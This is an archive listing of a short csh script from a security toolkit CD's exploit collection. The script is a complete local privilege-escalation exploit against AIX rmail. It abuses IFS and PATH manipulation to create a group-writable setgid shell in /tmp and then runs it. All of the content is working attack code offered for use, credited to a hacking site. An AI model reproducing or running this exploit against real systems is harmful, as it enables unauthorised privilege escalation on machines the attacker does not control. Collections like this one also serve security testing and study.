home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / aix / local / rmail.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  351b  |  19 lines

  1. #!/bin/csh
  2.  
  3. mkdir /tmp/.rmail
  4. cd /tmp/.rmail
  5. cat <<EOF>usr
  6.     cp sh mailsh
  7. chmod 2777 mailsh
  8. EOF
  9. chmod 777 usr
  10. ln -s /bin/sh . 
  11. setenv PATH .:$PATH
  12. setenv IFS /
  13. echo "cheezy mail hack" | rmail joeuser@nohost.com
  14. unsetenv IFS
  15. rm -f usr sh
  16. echo "Attempting to run sgid shell."
  17. ./mailsh
  18.  
  19. #                 www.hack.co.za           [2000]#